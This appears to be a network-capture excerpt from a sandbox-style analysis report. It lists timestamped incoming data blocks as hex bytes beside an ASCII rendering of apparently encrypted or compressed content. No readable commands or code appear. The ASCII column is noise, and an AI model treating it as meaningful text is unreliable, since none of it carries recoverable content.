                                                                                                                                                            2022-09-29 12:44:42 UTC12INData Raw: 7b 7a 68 e8 33 12 2c 15 40 2c 54 ec 79 9a 52 b7 2f d4 85 2e cc eb 09 9d 4a 52 ff d8 d3 3b c7 ed 0a f3 20 cd 8b a1 b2 65 0d dc dd fb 1a fc bd db 77 35 8c 9b b7 1d c2 13 15 9f 96 1b ea d9 09 de 75 fc d2 50 94 7c 83 52 c4 12 c2 80 bd 30 89 79 fb c8 f6 ca 6f 50 dc ae a5 ae 1b 07 7c 12 e7 e8 9b e9 ef d9 88 12 bb a0 b9 91 82 d0 60 5a ae 0d 7e 28 dd d8 f9 4d 97 ce f3 d6 e4 04 29 53 09 03 b7 54 8b e2 67 09 26 e3 17 06 e5 10 7b 2a 21 9a 55 02 a4 7a 30 f6 f7 c6 c7 42 18 58 78 cd 4d 47 fe 5d 88 7e 04 6c 1a 05 2b 5d 70 e1 b9 56 93 28 5e 28 c5 34 76 58 a9 87 31 02 51 53 c7 e9 e0 db b8 86 73 73 9b 36 86 ff 87 d7 3a 57 d3 73 e6 81 c4 5e 1c 19 3f 0b 6f 2b 36 ab 96 c5 de 84 40 0d 4e 68 68 a9 40 e4 a9 97 75 14 83 79 d2 31 a0 5d c4 67 ec 46 84 b5 d6 ac 45 92 08 ea 0e 0f 66
                                                                                                                                                            Data Ascii: {zh3,@,TyR/.JR; ew5uP|R0yoP|`Z~(M)STg&{*!Uz0BXxMG]~l+]pV(^(4vX1QSss6:Ws^?o+6@Nhh@uy1]gFEf
                                                                                                                                                            2022-09-29 12:44:42 UTC14INData Raw: d0 2c 20 15 74 1f 26 b4 1e f0 69 f8 78 26 ad 42 87 4a 0f ad a9 6d b7 ab 50 c7 e4 11 d0 9f 9f 2d ce a4 97 74 b5 da a8 61 76 ab 27 1a 8a a6 d2 ea 68 d7 15 97 a7 d7 40 62 60 3d 07 a8 9a 34 4b a8 69 4c 45 2f 50 7c 98 e6 c0 b4 0b 56 00 d5 4b 0f 18 5b 92 27 38 31 31 ea 43 9e 9a 9a 29 88 9c cb 7e 87 5d 79 36 8c 96 7c c3 1c eb 26 13 a1 76 e9 87 f7 ca f1 58 46 22 94 f3 ad bd 29 87 93 af 16 6d 45 67 f5 fb b3 f0 47 28 70 e4 df 8f dd f1 1d 3c b4 77 8c f5 d5 82 8f 16 99 d8 d5 a6 1a 8b 00 23 84 50 66 c9 62 8b a1 7e 7c 6a 3f 8f 12 8c ed ce ab c4 5d b9 30 b4 e7 9e 38 1b 2a 01 b7 47 c9 a4 20 7f b2 be 91 d1 ad 5a ce ac e5 9c 4f c3 15 f7 66 dd 01 95 5e a0 d9 36 11 38 e1 5f 4b cd 59 16 41 e2 71 6a 4e 5f 25 14 75 50 d1 30 bc d5 2b 3f 10 75 c7 4b 21 70 eb 53 b0 21 fa e6 46 b9
                                                                                                                                                            Data Ascii: , t&ix&BJmP-tav'h@b`=4KiLE/P|VK['811C)~]y6|&vXF")mEgG(p<w#Pfb~|j?]08*G ZOf^68_KYAqjN_%uP0+?uK!pS!F
                                                                                                                                                            2022-09-29 12:44:42 UTC15INData Raw: 38 23 b6 e1 9c b9 61 ba 53 89 fe 4d 8b c1 de 1d 7f c9 0f 04 9c 2c 7d 8d c7 18 a4 bd dc a5 be 45 62 9c f5 4f 28 6f 3c ff 87 3f 4b 87 45 de 4f 8f 1d fe bd 02 a8 12 63 0d e0 58 c7 43 ca a3 e0 46 16 d6 45 1b ab a7 94 ec e6 76 0f da 15 da 0a b4 f9 fb 2f 8a 85 c0 19 28 46 b3 52 30 21 5c 87 79 34 e7 9a d7 74 59 c8 02 66 7c 43 ad cb 7a 18 6d 67 30 3f 78 3b 58 71 30 e0 7f ff 9d 23 69 00 f1 39 47 e3 88 15 95 50 6f a7 0e 04 63 36 0b eb 22 60 ee f4 5a a2 f1 df b8 3a b1 ae 8b 96 98 2d af d1 d7 2e 1c 30 b1 26 8b 3f ee d5 0b cb f2 4f ff 60 e4 15 14 ae c1 9b b0 fa b1 05 63 74 df d1 03 9e 22 35 29 92 ae 26 48 49 2c 76 87 bc ab e5 18 c0 d1 dd c2 3a 96 6b 3b 7c a8 aa 8a cc e9 6d ce 54 fe 1d dc cf 6e 08 3a a6 b3 d0 1c 3c 21 ba 23 ca 81 e8 c9 f6 17 d3 4a 9f b4 5f 70 86 39 c8
                                                                                                                                                            Data Ascii: 8#aSM,}EbO(o<?KEOcXCFEv/(FR0!\y4tYf|Czmg0?x;Xq0#i9GPoc6"`Z:-.0&?O`ct"5)&HI,v:k;|mTn:<!#J_p9
                                                                                                                                                            2022-09-29 12:44:42 UTC17INData Raw: 3d 0d 53 dd 1d dc 12 35 25 bc 25 53 c5 74 6f ac 4f 14 b9 e3 67 de da e3 c8 0a e4 83 0e 06 23 ed 40 0c bb fd 86 92 fe b8 df e6 5a 41 34 9c 2d f2 d2 0b ae a2 85 51 dd 6d 90 f6 2c 8f 9a 0f 04 eb cd 23 1f 97 f5 f1 4e 0f 63 45 4e f3 72 a5 0c 3f 7c 9c d7 5c d2 55 cf 97 5b 77 82 4b 04 60 62 28 62 87 1f ff e8 cb 2e 58 06 7a a1 5a 77 37 f0 68 6d 8b c6 41 3b b9 f0 da e9 7b 5e 5b da 76 28 69 bf b4 b9 a3 da 65 56 41 23 70 f8 05 4b b2 f4 42 18 3d 6f 74 a3 02 82 6c 84 bd 42 30 18 aa 6c 50 ff c3 23 a9 ad cd 50 b9 8b a7 b2 40 b3 c7 49 ee 17 0c e5 ef 59 3c 42 e1 28 23 68 f9 47 48 37 be 08 40 c3 7c 2a 87 a4 04 4b 71 9e 79 0b d8 a9 a9 1f 2f 56 d6 46 56 9f 6f aa 8e d0 ce 4b 1a dd 4c e9 6f 10 49 d7 bd ae 53 d5 70 94 f2 06 00 be 74 78 71 8d 4f 0b 5c 29 cb 33 94 14 e7 c7 b3 62
                                                                                                                                                            Data Ascii: =S5%%StoOg#@ZA4-Qm,#NcENr?|\U[wK`b(b.XzZw7hmA;{^[v(ieVA#pKB=otlB0lP#P@IY<B(#hGH7@|*Kqy/VFVoKLoISptxqO\)3b
                                                                                                                                                            2022-09-29 12:44:42 UTC18INData Raw: 9a 4b ac 49 ab e2 1c 36 bb 0b e4 6e a6 23 ec 6c 14 5d 30 68 e1 d2 47 84 02 c0 39 aa dd 08 5e 3e 4b 4b 33 83 fa c1 c1 2c f5 98 d1 49 9e a7 97 91 53 62 32 af fb 6b b9 9a 99 d2 f9 8d 6e d1 9e 67 80 8b ce 7b d9 87 b8 c3 25 f9 99 a3 1a dd 4a da 04 d8 20 03 76 86 48 a1 8c bc cf ad 78 f5 c9 ca 93 a6 8a 77 25 9f 01 e3 40 24 b7 08 8e 30 68 e9 dd 84 fc 30 8a 67 b5 61 3f f6 e1 bf 21 48 0e 5e 0c 33 9d 54 17 d7 b1 25 27 29 32 38 10 3d 9f 6d 35 5d 30 d0 f6 0b 6d 1f 59 11 e5 69 03 ab c9 bb b9 cb 0f 45 0f 84 e6 35 3e 38 9b 49 d5 8f b3 76 81 39 ad 13 14 8d 84 f1 7e 49 c7 e0 34 01 4e 02 96 32 a8 30 26 53 3b d3 83 9f 5e c4 cc 5f 98 3a 3e 1e 22 2b 91 30 82 7a b6 8a 93 d5 3b 41 92 ed 16 0d ff e6 51 d3 dd 0f 3c 8b 14 86 6f 6e 28 41 a1 37 11 1d e0 8b 44 30 93 44 c5 82 3a 99 b7
                                                                                                                                                            Data Ascii: KI6n#l]0hG9^>KK3,ISb2kng{%J vHxw%@$0h0ga?!H^3T%')28=m5]0mYiE5>8Iv9~I4N20&S;^_:>"+0z;AQ<on(A7D0D:
                                                                                                                                                            2022-09-29 12:44:42 UTC19INData Raw: ac 9c 8c 93 a9 2a c3 a4 30 fb 7f 88 81 83 37 66 5a c5 3a a1 59 e9 3d 3e 2d ea 91 8e ad 73 f6 ea 0c 61 50 8a 93 85 f5 57 fe 6d 84 af f0 af 77 f1 45 ec 3d 56 9e c1 72 4b 48 14 8b a4 39 8e 3d c4 ed 55 17 a3 c5 f2 00 3f 1c 21 9d 0c bd f3 4f bc 74 1c 22 7c 16 15 30 95 0a 4c f7 fa 91 9c ed a8 8b 10 b9 d8 ba f1 ba 67 fb 7c 5a b9 16 3f 5e 79 68 0f 3f 66 3e e6 02 37 d7 90 1e 51 3f cf 16 e3 f8 6c 3c 9f 1c ff 46 10 16 ef de 78 cf 1c b7 1a 3e 85 39 84 ea a6 36 ca 78 5c 33 42 a3 9b 60 b4 5f fd 1b 5e 42 1a 60 24 6f 54 41 6b ea a3 ef 63 7f 05 94 85 cc 3a 1d 75 a1 34 16 57 a5 dc d9 46 7b a5 b2 e2 4c db e3 07 19 cd e7 c7 6c 3e dd a2 29 89 de 79 d4 c8 a5 13 42 a4 fe e6 9a d0 d0 0c d1 16 9a 2c 61 45 49 d3 7a a0 0c 4e c5 3f fd 14 6f 37 49 fa bf 8e 6b 79 38 3b 60 aa d2 c3 55
                                                                                                                                                            Data Ascii: *07fZ:Y=>-saPWmwE=VrKH9=U?!Ot"|0Lg|Z?^yh?f>7Q?l<Fx>96x\3B`_^B`$oTAkc:u4WF{Ll>)yB,aEIzN?o7Iky8;`U
                                                                                                                                                            2022-09-29 12:44:42 UTC20INData Raw: 57 09 89 3b 60 2f da 39 06 cc 7c 81 d8 a0 d4 b0 f0 13 a4 5e 5f 3d b2 31 1e f7 44 d5 ca 34 94 53 1d 74 b1 05 98 b5 1f a2 3c 71 c7 63 2d b3 cd 20 54 b3 f5 31 04 10 b3 6a d4 fd 5a e2 b4 8f 99 53 84 17 b9 17 94 68 c1 a0 a5 7a 9e a0 d2 ac ed 0d 0b 53 18 bd e7 3e 04 29 2f 6f ad 81 39 02 e2 fe b7 da 24 92 2f db b5 6c 27 f2 d8 61 76 12 c7 09 b5 8f fb e1 26 4a ad 5a 7d bb 1f ed eb a3 06 0d 31 4f 45 c2 a6 46 b3 b8 82 09 4d 90 43 76 f7 64 7a e0 b0 2f 35 9e 39 bd 9e 38 c8 e4 fc 17 68 62 2b 05 ae 8e d6 55 60 f3 41 26 ab 7c 39 ca 53 eb bb 59 4d 6f 68 f7 66 a5 0b 31 e2 9a 59 f7 d1 b6 3e 4d 9c a2 2c dd 28 ea 68 2c 62 32 80 32 17 3a 2e 9e 71 d5 8f 75 8a 0a 8d 2d 38 0c 4e 11 b6 20 c4 51 56 42 c4 02 ce 48 eb a5 75 01 0a 05 22 ce 17 e0 bc 1c a9 31 85 59 44 4a df 46 b8 a2 04
                                                                                                                                                            Data Ascii: W;`/9|^_=1D4St<qc- T1jZShzS>)/o9$/l'av&JZ}1OEFMCvdz/598hb+U`A&|9SYMohf1Y>M,(h,b22:.qu-8N QVBHu"1YDJF
                                                                                                                                                            2022-09-29 12:44:42 UTC36INData Raw: 3a 2f bf c2 a3 8b 73 33 8d d1 5c bf b8 bf 30 eb 9e 89 a6 0a c9 5c a1 61 a8 37 dc d3 d3 73 29 a7 d8 09 01 2e 5c 25 cc e4 6c 6d a9 16 7e 50 07 f9 e6 d5 a3 68 cd 85 c8 29 dd 7d 46 ea 36 fb 71 fb d5 17 84 4a 13 9e 75 dc 24 22 93 96 d1 a3 41 33 95 3c d4 53 45 bf d2 36 69 79 b1 f8 b2 92 41 e6 80 9c 6f 1b 63 cc 39 07 af bb a5 ac cf 17 53 b8 50 da 6c d0 22 79 ad 16 ad 5d 6b c1 b8 ba c5 ee 0f 1e 12 00 74 8b f3 ac 63 dc 91 d9 56 48 7d 19 79 6b c8 8c 39 ad 3d 9d 75 f9 01 24 ca 39 f5 02 85 1a de 66 e0 31 9a 81 28 c9 6f 83 c2 6e fc 59 b0 8c 46 18 1c 3f bd b8 41 08 14 76 41 18 83 1c 8c c6 50 37 29 01 ec 92 de b4 87 07 6f f3 b8 1b 1d 05 81 b7 5e 21 58 5b 5c fb 6b 36 b5 0d 95 42 fb 6a 1f 6e d0 53 9f ee 1c 20 c5 e7 77 71 e1 90 26 ad aa ed 45 59 c2 34 bc 32 c3 58 22 50 aa
                                                                                                                                                            Data Ascii: :/s3\0\a7s).\%lm~Ph)}F6qJu$"A3<SE6iyAoc9SPl"y]ktcVH}yk9=u$9f1(onYF?AvAP7)o^!X[\k6BjnS wq&EY42X"P
                                                                                                                                                            2022-09-29 12:44:42 UTC52INData Raw: 3f c2 33 9c a4 f5 61 71 9b f0 a3 66 76 29 03 59 ec d7 60 47 f5 f9 d9 76 2e a8 01 fe 24 41 ca 6c 0b 96 45 47 df 38 80 47 2b 0b c9 ee 59 1b 47 8f c9 0a fa 46 e5 c2 31 ca b5 01 a7 27 0f 3a 46 79 d6 9f d9 9a 85 3a 3f 84 08 cf b5 bd 35 c3 13 1a 98 00 d0 8e e1 71 43 9b f7 59 8d f4 57 27 79 27 9b d0 1b 46 f8 a7 8d cc 97 1e ac 36 89 10 3f c4 6a 1f a6 82 8e c2 18 ea 2f 30 df b9 73 03 06 e8 76 74 54 a1 c2 56 58 fb ca 02 70 1b a4 8a 9b fc 4e 81 cb 7f e4 49 55 d7 ca 43 b1 78 63 b5 d0 42 d4 4c 1c 76 aa d5 b7 db 50 7b b7 98 45 7c ee f4 e8 53 6e 2a f9 c3 13 dc 2d d6 aa f8 f0 51 b5 53 73 e5 8e 7c 56 64 69 a9 cf 96 ed 4c bb f8 e5 0e f1 a3 a0 c9 60 31 fb 15 ee d6 80 6f d6 54 20 12 63 df 17 14 5f 7c 46 c9 6e 48 f3 5a 90 38 39 ac 45 52 a9 67 b8 43 a2 78 96 b6 5c bc 63 0e 87
                                                                                                                                                            Data Ascii: ?3aqfv)Y`Gv.$AlEG8G+YGF1':Fy:?5qCYW'y'F6?j/0svtTVXpNIUCxcBLvP{E|Sn*-QSs|VdiL`1oT c_|FnHZ89ERgCx\c
                                                                                                                                                            2022-09-29 12:44:42 UTC68INData Raw: fc a4 ac f1 3c 8d 2d 70 20 41 b3 3a d5 bb 30 04 e0 cc 85 c1 6a ae bf 8a 7b a3 28 e7 ea ed dc c8 24 ee 73 45 42 d9 47 37 27 fb 49 cc fe 97 38 f4 33 fe a5 73 7c e8 9e c2 b5 73 95 30 85 18 39 dc f1 02 08 7d eb 76 75 95 35 c9 53 f0 3a 88 b3 63 f7 52 cc 3a d8 02 39 c6 e3 fb ce 21 c5 53 ff ae 48 48 bf 9e 8b bf 96 63 07 ad 8c 90 fd 6c 4f e6 06 7e 27 75 26 96 81 ec d9 08 30 e9 e1 b7 cd 43 c7 c6 e1 63 c1 01 46 6f 75 8b 82 43 1f b2 6d 6e ad 0f 72 0f f5 84 63 7b 29 1d bb a5 7f 9b 31 bd 78 fa 88 66 5a ca 2f 5f fb 3b 79 0c b3 21 2b d2 4f ef 53 52 79 27 58 ab e6 8d de 84 0b c2 40 19 04 20 83 87 d5 bb 39 56 6b 89 f0 9d 4a 1e 36 f9 8b 4c 09 b2 b4 b1 b7 11 c8 09 8c fb 1c fe 29 91 52 83 d4 61 0b 52 54 02 ff ed 1f 95 1d 2f 99 fb 30 24 45 1d fd 1b 79 f1 41 71 c5 25 7a d0 ed
                                                                                                                                                            Data Ascii: <-p A:0j{($sEBG7'I83s|s09}vu5S:cR:9!SHHclO~'u&0CcFouCmnrc{)1xfZ/_;y!+OSRy'X@ 9VkJ6L)RaRT/0$EyAq%z
                                                                                                                                                            2022-09-29 12:44:42 UTC84INData Raw: dd 86 ef c3 bb 7d 78 d9 5b 4c 9c 7d 61 b2 37 54 46 58 b0 97 76 c9 40 b0 12 3d 20 00 6f 79 8b 0b 1e 88 33 2e e8 bd 78 20 6e 66 3d c7 ce 6d d0 2d c7 cf 8e 65 4c 97 9e 11 4e b5 b1 07 43 87 17 32 55 20 6c 8e fb 51 6e 4d bd 97 15 88 bb 92 ad 04 12 32 c4 97 57 2e 78 38 ad 56 23 9b 65 3f a5 8b 25 1c 6e 7e fb ad 0f e6 85 b3 d1 00 3a ba 84 fa c7 0c 74 8a 15 1c 7b e0 a2 96 03 7f 4d fb cf 2e 22 77 e1 72 42 d6 72 e6 21 71 20 0e 02 7c 90 82 45 dd 92 2b 36 7b 88 e7 ca 2d 70 04 ae 15 2e 68 ee 7a a5 21 d8 a2 68 42 6d aa 6c 70 24 46 ea 46 e9 65 78 91 f8 33 bc 17 b7 9a 0f 55 1e 1e aa be d3 03 cd 9b 2a 70 eb 84 e3 f3 1b 81 d6 55 45 6a 86 31 a4 c6 49 a8 7c 61 89 3c 7e f3 f2 fa aa ed b4 13 07 36 ba 60 2b 1b 4d 59 1a 13 db 55 e9 43 e9 3a eb 68 c3 c5 5a cd 7d 3b 4f 8c 6f 97 bd
                                                                                                                                                            Data Ascii: }x[L}a7TFXv@= oy3.x nf=m-eLNC2U lQnM2W.x8V#e?%n~:t{M."wrBr!q |E+6{-p.hz!hBmlp$FFex3U*pUEj1I|a<~6`+MYUC:hZ};Oo
                                                                                                                                                            2022-09-29 12:44:42 UTC100INData Raw: 39 71 d2 b5 83 5d ce ab 21 74 60 76 2e b4 f7 9f 48 be 4f f9 3e 0e cf 32 69 3e bf 9d 74 9f 80 e4 9e 62 48 6f b9 c1 a3 58 e4 a0 4a 9d df b4 3d 19 c6 94 07 87 9b 52 64 1b 28 ca e6 29 93 3b dc dd 03 bd 6b 79 97 5c cf 13 c3 30 d5 89 b5 c7 e4 3f 30 4e 2c f4 e5 8b 3a b5 b1 f3 be 30 cd aa f7 ee e1 00 83 94 9a 9d dc 27 77 dd b4 8e f6 45 52 d0 30 6e 46 49 f3 65 78 f5 fa c8 30 99 68 0b 11 97 4f 0b cb 2c fd 9a a2 ef 77 0d 2a c7 a4 77 27 07 7d 6d 11 f8 67 35 3f 19 78 c0 ba b9 0c dc c8 81 dc 76 b9 64 c5 e6 11 ec dd 7b 01 4b d7 b4 19 bc 94 26 cc 9f 1e 8b c4 f7 29 4b 33 3b 0b 41 b0 2d 92 b3 15 21 01 16 4b 29 c3 42 1c 37 b6 d6 c5 fe f8 3d d2 57 02 95 94 a5 57 0a d3 2d 2a 7f aa 2a 9a 0d 77 38 1f d9 08 08 13 8f 03 d2 eb f4 23 75 c6 72 2f 31 49 cb 39 e8 4d ff b2 00 73 8c a8
                                                                                                                                                            Data Ascii: 9q]!t`v.HO>2i>tbHoXJ=Rd();ky\0?0N,:0'wER0nFIex0hO,w*w'}mg5?xvd{K&)K3;A-!K)B7=WW-**w8#ur/1I9Ms
                                                                                                                                                            2022-09-29 12:44:42 UTC116INData Raw: 2c 12 33 d7 9a f8 a7 1b 9d 39 64 7a 4f 6e cb 87 6a 91 c3 96 30 d3 87 c4 33 8a 0a 99 7d 7c 85 23 07 d2 ba 25 69 28 02 1f 15 3f a0 4e 0a 33 96 0f d3 3d 71 66 fe bc 48 08 b7 2f a2 85 a2 7b aa 49 ba fb 97 95 f5 9e 17 c7 8d e6 46 58 8e fb 64 7b d2 86 9e 1a 97 4a a9 dc 27 ff d6 d6 ad e3 f6 30 6e b1 73 0c a8 08 00 f5 d0 88 db 5b ba 3a 5d c9 0e 06 bd 71 8d fd 7a 64 b0 3d e4 d8 c3 83 c5 44 ce 1c d8 e0 29 18 bd a2 80 9d ee 59 f6 1b b9 a9 bd 15 19 9a a0 99 8f cf c6 92 c7 fd 18 3e 08 c6 82 89 46 2b 28 20 86 41 7e 0c 58 3f 99 79 4c 3a 6b 95 b2 db f0 55 26 f5 57 a4 41 82 a0 2e eb bf 61 68 7b f7 84 45 91 e1 fb 07 c1 37 28 67 fa bf d4 db 49 24 9b 19 3f ab ab 16 02 a6 6e 98 e6 a5 c6 c4 31 03 4c b0 08 81 57 b8 31 51 5e 38 91 b5 6f aa 09 21 65 48 98 bf ec 04 17 3d 4c 92 50
                                                                                                                                                            Data Ascii: ,39dzOnj03}|#%i(?N3=qfH/{IFXd{J'0ns[:]qzd=D)Y>F+( A~X?yL:kU&WA.ah{E7(gI$?n1LW1Q^8o!eH=LP
                                                                                                                                                            2022-09-29 12:44:42 UTC132INData Raw: 86 6b f1 b4 ec 7f 13 51 71 24 cd fd f7 d0 76 db df 31 89 4b 8a d4 a1 fb 87 ad 45 9e b7 87 35 90 aa 86 5a ec 83 20 fb 16 f3 0c 50 62 14 4b df 7d fb af 1c 6a 8a d1 15 20 49 b0 1b 30 2b e0 c9 23 25 0f bd 0f 2d 90 ee 76 2c 62 92 20 a9 5a c9 d7 4f d0 ac a8 c9 35 c5 c1 ed 6c 8c 7e 7d 9c c3 6a bb 97 25 ac 31 3c e8 55 c2 1a 84 4e ef 14 0e 40 2c c5 bc 70 30 2c db 62 30 56 af 82 2c d3 b6 b6 a2 10 77 a8 1e a2 3f f8 cd 68 cc d3 cd dd d9 36 1f e7 5c 94 ce 30 fc 63 0f bb 7f 04 63 a0 ec ad d4 a2 27 e1 77 40 a5 22 02 41 45 f8 54 9b 5e a6 2f 77 0f b6 06 96 82 a0 45 7b a7 00 2d 93 36 97 fa a8 27 3f b7 61 be 31 ab 0c da c1 9c 95 88 13 7c 85 a7 dc 22 ba 67 19 db a8 75 e9 06 62 da f2 d8 1c ea 52 22 5f 2b b0 5a 67 2c 57 81 be a3 7e 43 3b 90 0c 62 8c 4f 0b ff 45 be ed d2 6d b9
                                                                                                                                                            Data Ascii: kQq$v1KE5Z PbK}j I0+#%-v,b ZO5l~}j%1<UN@,p0,b0V,w?h6\0cc'w@"AET^/wE{-6'?a1|"gubR"_+Zg,W~C;bOEm
                                                                                                                                                            2022-09-29 12:44:42 UTC148INData Raw: 4a de b4 92 1e 09 2f f2 3d ff b7 e5 3b 1c 4e 91 6c 72 e5 41 4b 31 a6 13 6b 68 68 ef cb 3d 9f 07 67 d0 92 af 4b 90 10 1f 7a ba 23 47 36 dc 10 bb 91 1e 41 34 04 05 20 04 e7 d9 36 b8 4e 2c 43 2b 1e 8d a1 82 f3 a8 4c 54 04 9e 8a 53 37 7d 98 68 f1 ef 2b 5c 25 3a c3 40 f9 c3 bf d9 9f 52 13 1f d5 0e 09 a9 3e 7d ae 34 19 2c 9a 12 44 77 9e eb 35 35 90 1a 3e f6 29 67 ca 60 6c 6f 4f 71 3d 65 c9 c1 c9 a6 c7 4e bd cc 25 07 dd 4b 95 f5 00 27 20 f0 4d 2b 74 30 5a b5 81 cf c7 bf 1b c9 73 d9 be 0b a6 58 41 5b 07 17 19 95 09 67 2c 0a 31 11 35 e6 9d 2e 29 c9 df bb 8b 63 f3 f0 a4 79 8e f9 b4 27 e6 5e 8d e5 34 47 73 72 ce 98 dd 87 b7 b8 97 b7 16 6f 21 d8 13 c3 3c 64 02 dd 0b 3f b6 10 1e 74 5d 53 31 c0 ab e3 6e 56 fb 8b 5b e7 6e 15 7f bd 4d f5 ba 78 84 99 59 ce 6b 57 b6 25 ae
                                                                                                                                                            Data Ascii: J/=;NlrAK1khh=gKz#G6A4 6N,C+LTS7}h+\%:@R>}4,Dw55>)g`loOq=eN%K' M+t0ZsXA[g,15.)cy'^4Gsro!<d?t]S1nV[nMxYkW%
                                                                                                                                                            2022-09-29 12:44:42 UTC164INData Raw: 54 52 81 1a e0 2f aa bc 16 78 5f aa d0 3f 4e 15 64 0f 25 55 b5 86 7c c0 05 73 b2 05 c6 44 8a 6e 7c 8d 2b 0d 68 81 d2 06 2a b5 ec cf 34 5e 82 e6 21 ae 71 aa 72 44 14 ce a0 1a c3 ff ea fe 34 09 6d 5a 24 b6 90 30 b4 c0 94 c3 a0 62 b0 79 18 ab df 66 e7 56 84 8d d1 c3 45 e0 2a 1c 71 b6 98 22 19 c3 e3 3b c7 6b dd 12 16 e8 64 c7 5e 51 e8 d0 5c b9 5e 48 35 8e f6 4d 78 a8 83 ce ef 2d dc fc aa 72 e4 6b a6 53 54 8d 6d 0c fa d6 e0 a4 a9 7b 03 b6 d5 64 fd 20 fe 7f 5f 12 48 58 33 20 4a b6 e4 5b 56 60 42 a8 22 89 df 90 f1 62 32 10 3c 9b 05 9c fd 24 4b 6f c1 07 a4 97 70 cb 66 ab fc c5 c0 9c 31 de 06 72 d4 07 63 78 9f 8d 82 99 32 9f ef 6f 38 7d f9 98 d7 06 1e a6 8a 21 bb 99 01 44 69 f2 e3 d9 6f 4f b7 b1 d7 65 7a bb 5a 3c 4b c8 16 19 7c 39 cd fe 4f 31 2e 65 88 50 bc f1 c1
                                                                                                                                                            Data Ascii: TR/x_?Nd%U|sDn|+h*4^!qrD4mZ$0byfVE*q";kd^Q\^H5Mx-rkSTm{d _HX3 J[V`B"b2<$Kopf1rcx2o8}!DioOezZ<K|9O1.eP
                                                                                                                                                            2022-09-29 12:44:42 UTC180INData Raw: 51 be ab f7 43 31 2d a6 9b 5a c2 b2 e8 76 85 a6 05 3a d3 55 bf b8 45 b0 04 44 f5 57 31 6b 06 53 79 18 14 05 a5 2d 80 07 d7 8a c6 d7 54 6a 55 a4 2c a8 64 9e 3f 5d e1 f5 5d 6d 3f 76 f1 c5 06 2b b8 b0 b9 94 ac a5 01 bd 0c 4b 4a 7e 16 7e 14 cb 13 e2 86 3b 89 5b 86 41 e9 3e 7a a0 90 63 76 28 a2 92 61 44 6a 0c 18 83 7a 56 1c ca 89 94 65 92 58 0c 9a 39 72 5a 85 77 37 50 d3 71 99 a5 0e dd d5 c1 1d 7e 56 ad d0 2c 8f 42 d3 5a 52 a5 e6 6c 94 74 63 01 04 11 e6 be 95 29 a5 f2 85 e1 b9 2b 73 f2 96 53 35 89 90 20 af f3 f0 76 4c e9 ce 21 3b a3 b8 ed 32 55 33 0b df e0 fd 5a db 73 bd 61 49 dd 14 6e 28 19 da 3d b9 90 b3 83 c2 c3 2b e9 7e 1c c2 6e dc 84 12 b1 f8 0b d9 33 76 c9 24 c4 67 b1 9f cd f1 5d 31 d3 96 2b 9c f4 0f 14 36 e3 3e f5 1b 61 5a 19 03 61 7d c4 15 7a 66 94 e6
                                                                                                                                                            Data Ascii: QC1-Zv:UEDW1kSy-TjU,d?]]m?v+KJ~~;[A>zcv(aDjzVeX9rZw7Pq~V,BZRltc)+sS5 vL!;2U3ZsaIn(=+~n3v$g]1+6>aZa}zf
                                                                                                                                                            2022-09-29 12:44:42 UTC196INData Raw: 4a 41 0b 3c 2d 04 77 7f 12 6f 92 99 86 2f c7 56 ea 81 cb be 00 b3 a6 14 88 fe 45 80 e0 52 3e 0b 73 d6 61 09 38 d0 ec 6e 00 a3 2c 8c 65 eb 8e f0 5d d2 e6 8b 1d 28 3f 19 2b 09 2d 53 51 a2 af f5 95 15 8a ba a6 e2 16 5e 2d ef fd df cc 90 12 b3 22 49 16 31 83 b1 74 71 f8 5d f4 e2 db 0e e8 63 29 57 22 be b8 65 bc 7f 01 d9 d4 45 00 8b 9c 06 8c 09 a6 1a a5 85 f4 52 d4 50 01 e7 37 53 df 8e ad f2 09 e2 16 f4 34 69 ab e0 ce ea eb 0d 0e 10 76 13 8e fd 2a 6e 0f 16 34 6f 19 61 cd 9c fd ee f7 b0 02 13 4f 66 26 65 c0 f3 76 72 e9 b7 ae 59 db a7 d1 bd ef 1a 70 58 49 50 34 0f 24 ad 99 43 3a 76 d2 87 96 95 2d 3a f5 ff cf 3a da af 7d f0 7b eb 7e 03 f5 fd d0 9d 13 09 bb 39 1d 41 ae ed c7 e4 92 38 9a f3 2c 43 35 8d cd 88 d1 bf c8 0a c8 e7 d1 9e 7b 78 ef b3 af 8d 38 3a 2c f6 9a
                                                                                                                                                            Data Ascii: JA<-wo/VER>sa8n,e](?+-SQ^-"I1tq]c)W"eERP7S4iv*n4oaOf&evrYpXIP4$C:v-::}{~9A8,C5{x8:,
                                                                                                                                                            2022-09-29 12:44:42 UTC212INData Raw: c4 36 0f e3 ee be 1b a4 2b 62 2b 98 f6 95 f1 29 b3 7c 46 85 15 40 64 9c 68 16 6c bd dc 67 b5 36 f3 05 ad 41 35 8a 32 d3 e3 d5 e1 ad ca 4e 24 ff 32 ea 55 fb 3a de 31 a3 22 e9 14 47 c0 7a 60 79 10 49 52 8d 86 3d 8f b5 9d cb 63 e8 02 f2 cf df 81 2d d5 b4 a6 48 24 6a ba cb f4 29 cb 89 1c f7 31 45 ed b6 42 30 84 5b 9c 1c d4 0b e0 c6 2f cd 26 79 93 b4 46 9b 8f a9 96 f4 36 60 9c 92 f2 66 cb 64 bf 38 6e 81 a2 2c e6 46 f6 ea 95 a5 32 d7 43 8d 67 ce 3c c9 81 ab f7 41 8c a7 d4 c2 73 91 88 d7 37 a0 fb 27 43 ef 1d b0 c1 0c cf ec 66 a3 75 28 c3 a4 c3 5e 8b 0e 5e ba d4 b4 95 82 d3 a5 14 48 34 f1 c0 4b ef b4 89 e9 41 b4 7e c5 79 76 a4 38 de 8e c2 b0 49 07 11 0c ae f9 4d fd ad 6a 97 5d fa 2b bb ba c0 44 3f 0f 33 52 67 06 a4 6f 02 15 d2 14 0b f7 6f d1 8b 9e 79 cb b5 e8 c9
                                                                                                                                                            Data Ascii: 6+b+)|F@dhlg6A52N$2U:1"Gz`yIR=c-H$j)1EB0[/&yF6`fd8n,F2Cg<As7'Cfu(^^H4KA~yv8IMj]+D?3Rgooy
